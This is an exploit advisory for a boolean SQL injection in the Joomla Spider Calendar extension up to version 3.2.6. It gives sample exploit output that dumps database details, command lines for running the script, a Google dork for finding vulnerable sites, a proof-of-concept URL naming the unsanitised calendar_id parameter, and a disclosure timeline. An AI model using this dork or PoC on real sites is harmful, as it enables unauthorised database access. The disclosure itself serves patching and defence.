$$$$$\ $$\ $$$$$$\ $$\ $$\
\__$$ | $$ | $$ __$$\ \__| $$ |
$$ | $$$$$$\ $$$$$$\ $$$$$$\$$$$\ $$ | $$$$$$\ $$ / \__| $$$$$$\ $$\ $$$$$$$ | $$$$$$\ $$$$$$\
$$ |$$ __$$\ $$ __$$\ $$ _$$ _$$\ $$ | \____$$\ \$$$$$$\ $$ __$$\ $$ |$$ __$$ |$$ __$$\ $$ __$$\
$$\ $$ |$$ / $$ |$$ / $$ |$$ / $$ / $$ |$$ | $$$$$$$ | \____$$\ $$ / $$ |$$ |$$ / $$ |$$$$$$$$ |$$ | \__|
$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ |$$ __$$ | $$\ $$ |$$ | $$ |$$ |$$ | $$ |$$ ____|$$ |
\$$$$$$ |\$$$$$$ |\$$$$$$ |$$ | $$ | $$ |$$ |\$$$$$$$ | \$$$$$$ |$$$$$$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$ |
\______/ \______/ \______/ \__| \__| \__|\__| \_______| \______/ $$ ____/ \__| \_______| \_______|\__|
$$ |
$$ |
\__|
$$$$$$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\
$$ __$$\ $$ | $$ | $$ ___$$\ $$ __$$\ $$ __$$\
$$ / \__| $$$$$$\ $$ | $$$$$$\ $$$$$$$\ $$$$$$$ | $$$$$$\ $$$$$$\ \_/ $$ | \__/ $$ | $$ / \__|
$$ | \____$$\ $$ |$$ __$$\ $$ __$$\ $$ __$$ | \____$$\ $$ __$$\ $$$$$ / $$$$$$ | $$$$$$$\
$$ | $$$$$$$ |$$ |$$$$$$$$ |$$ | $$ |$$ / $$ | $$$$$$$ |$$ | \__| \___$$\ $$ ____/ $$ __$$\
$$ | $$\ $$ __$$ |$$ |$$ ____|$$ | $$ |$$ | $$ |$$ __$$ |$$ | $$\ $$ | $$ | $$ / $$ |
\$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ $$ | $$ |\$$$$$$$ |\$$$$$$$ |$$ | \$$$$$$ |$$\ $$$$$$$$\ $$\ $$$$$$ |
\______/ \_______|\__| \_______|\__| \__| \_______| \_______|\__| \______/ \__|\________|\__|\______/
j00ml4 Spid3r C4l3nd4r >= 2.x <= 3.2.6 SQLi
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[+] Searching for Joomla Spider Calendar vulnerability...
[+]
[!] Boolean SQL injection vulnerability FOUND!
[+]
[+] Detection version in progress....
[+]
[+] EXTENSION VERSION: 3.2.6
[+]
[!] http://10.0.0.67 VULNERABLE!!!
[+]
[!] DB NAME : joomla
[!] DB VERS : 5.0.95
[!] DB USER : pippo@localhost
Exploit Usage
1) Joomla standard path: http://localhost/index.php?option=com_spidercalendar
[user@localhost ~]$ python j00ml4_spider_calendar_326_sqli.py -H http://localhost
2) Joomla Custom path: http://localhost/joomla/index.php?option=com_spidercalendar
[user@localhost ~]$ python j00ml4_spider_calendar_326_sqli.py -H http://localhost -b joomla
Download
Download Exploit: HERE
Info
######################
# Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329
# Dork Google: inurl:option=com_spidercalendar
# Date : 2014-08-31
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/joomla/index.php?option=com_spidercalendar&calendar_id=1 [SQLi]
"calendar_id" variable is not sanitized.
######################
# Vulnerability Disclosure Timeline:
2014-08-31: Discovered vulnerability
2014-09-04: Vendor Notification
2014-09-05: Vendor Response/Feedback
2014-09-05: Vendor Fix/Patch
2014-09-05: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################